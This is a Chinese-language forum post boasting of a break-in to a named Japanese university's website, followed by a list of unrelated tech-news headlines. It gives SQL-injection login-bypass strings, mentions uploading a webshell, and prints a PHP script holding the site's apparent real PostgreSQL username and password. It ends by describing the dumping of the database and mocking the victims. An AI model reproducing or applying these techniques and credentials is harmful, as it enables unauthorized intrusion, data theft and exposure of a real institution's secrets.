黑客入侵日本共立女子大学技术分析
共立女子大学的网站是http://www.kyoritsu-wu.ac.jp
先是摸索这个网站的结构,Apache+php+Redhat,只能看出这么多,静态页面应该是真的。至于数据库,不能确定是MySQL。
刚开始也没想到是PostgreSQL,只不过一开始好像有个直觉。
大体看了下页面,然后用谷歌site语句搜索了一下
- site:www.kyoritsu-wu.ac.jp inurl:.php?
复制代码
就几个页面而已,看了下也没什么用途。不过443端口开放
开始换衣后台在其他端口,例如443端口
- https://www.kyoritsu-wu.ac.jp
复制代码
或者有什么二级域名什么的的。
不过好像搜不到这个网站的二级域名。
其实最意外的是,后台暴弱,为什么我就不具体说了,后台地址嘛过几天放出。我使用
- admin'or'1'='1
- 'or'1'='1
复制代码
居然登陆了后台
虽然看不懂后台文字,不过“上传”还是看得懂的,webshell毫无压力
当然,这里不是正文。正文是,我找到了数据库配置文件,居然连不上数据库。
因为发现了phpPGAdmin,但是用这个也连不上
- http://www.kyoritsu-wu.ac.jp/pgadmin/admin/
复制代码
我就纳闷了,5432端口明明开放,为什么连接不上呢?
可能是pgadmin没配置好?自己写个程序试试?
- <?php
- $dbconn = pg_connect("host=localhost port=5432 dbname=cms_db user=postgres password=6ewgt39c")
- or die('悲剧'.pg_last_error());
- pg_query('set client_encoding=UTF8');
- $query ='select datname from pg_database;';
- $result= pg_query($query) or die( '又悲剧:'.pg_last_error());
- while ($result && $line = pg_fetch_array($result))
- {
- echo $line['wbtitle']."<br/>";
- }
- pg_free_result($result);
- pg_close($dbconn);
- ?>
复制代码
写了段脚本,如上访问,直接就悲剧了,根本连不上。
再回去看看配置信息没错啊,于是问了下核心开发群里的Juliet,她说很其实解决起来很简单
5432端口开放,PostgreSQL程序运行,配置正确,但是php无法连接的情况,只要把连接语句中的主机和端口去掉连接就可以了
于是写了段PostgreSQL的数据库操作脚本。地址在这里:
http://bbs.blackbap.org/thread-2480-1-1.html
Bingo! 成功。剩下的就是脱数据了 :-)
又一个负责人过几天要引咎辞职了 :-(
总结一下:看本文标题就知道我不是在讲入侵手法了,本文主要为解决脱裤时遇到PostgreSQL无法连接的问题,也就是本文加粗的字体部分。
更多信息来自东方联盟网:http://www.vm888.com
- 08-05微软开发脑机交互:意念控制操作系统
- 08-05微软程序员埋的一个漏洞:竟在Office中躺了17年
- 08-05Win10偷笑!Mac重大安全系统漏洞被修复 苹果道歉
- 08-05苹果Mac用户中招:系统藏大漏洞 密码设置形同虚设
- 08-05微软宣布为Win10带来Sets:所有UWP应用将支持标签化
- 08-05云计算:10个错误可能会摧毁你的企业
- 08-05让企业陷入困境的10个云错误
- 08-05数据泄露防护市场 英雄不问出身
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 11-18LG新能源宣布与Bear Robotics达成合作,成为
- 11-18机构:三季度全球个人智能音频设备市场强势
- 11-18闲鱼:注册用户过6亿 AI技术已应用于闲置交
- 11-18美柚、宝宝树回应“涉黄短信骚扰”:未发现
- 11-01京东七鲜与前置仓完成融合